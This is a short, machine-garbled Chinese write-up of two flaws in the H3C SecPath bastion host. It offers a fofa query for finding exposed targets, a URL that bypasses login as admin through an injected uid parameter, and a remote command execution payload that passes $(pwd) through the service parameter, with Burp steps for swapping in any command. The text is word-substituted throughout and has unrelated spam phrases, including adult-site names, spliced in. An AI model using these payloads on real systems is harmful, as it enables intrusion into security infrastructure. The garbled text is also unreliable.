免责声明：该著作仅用于期蜿蜒头与学习。请勿期骗著作所提供的干系期间从事违章测试，若期骗此文所提供的信息大要用具而形成的任何径直大要蜿蜒的效果及失掉，均由使用者本东谈主认真，所产生的一切不良效果均与著作作家及本账号无关。

一、裂缝形色

H3C SecPath堡垒机是一款专科用于安全惩处的堡垒机家具，不错通过宏大的看望纵脱功能和安全审计功能，终了对网罗劳动器的辛苦安全惩处和监控，该系统存在职意用户登录裂缝和辛苦大叫实施裂缝

1、fofa语法查找:'H3C-SecPath-运维审计系统'

图片麻豆 苏畅

2、登录页面如下：

图片

3、拼接URL，进行纵情用户登录

URL：https://IP:端口/audit/gui_detail_view.php?token=1&id=\&uid=，chr(97)) or 1: print chr(121)+chr(101)+chr(115) #&login=admin

图片

4、上述使用纵情用户登录裂缝已干与系统，不错看到admin为一个审计账号，接下来咱们进行测试辛苦大叫实施裂缝，测试辛苦大叫实施裂缝的期间，必须通过纵情用户登录大要账号密码干与后台才不错构造极度的请务实施大叫。

母子淫荡网

大叫实施payload：https://IP地址:端口/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(pwd)&identity_cond=&query_type=all&format=json&browse=true

使用burp进行捏包构造payload，在URL中service背面的括号中输入思要实施的大叫，即可终了辛苦大叫实施。检察反映包内部复返的本体

图片

本站仅提供存储劳动，通盘本体均由用户发布，如发现存害或侵权本体，请点击举报。